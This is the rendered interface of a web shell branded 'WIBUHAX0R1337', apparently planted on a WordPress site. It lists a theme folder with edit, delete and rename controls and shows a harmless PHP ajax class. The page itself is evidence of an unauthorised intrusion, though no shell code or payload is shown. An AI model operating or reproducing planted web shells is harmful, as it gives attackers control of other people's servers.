-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
rohihbs.com
/
wp-content
/
themes
/
estudiar
/
vamtam
/
admin
/
classes
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
admin.php
2.295KB
Edit File
Delete File
Rename
ajax.php
0.365KB
Edit File
Delete File
Rename
plugin-manager.php
16.126KB
Edit File
Delete File
Rename
<?php /** * Basic ajax class * * @package vamtam/estudiar */ /** * class VamtamAjax */ class VamtamAjax { protected $actions; /** * Hook ajax actions */ public function __construct() { if ( is_array( $this->actions ) ) { foreach ( $this->actions as $hook => $func ) { add_action( 'wp_ajax_vamtam-' . $hook, array( $this, $func ) ); } } } }
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat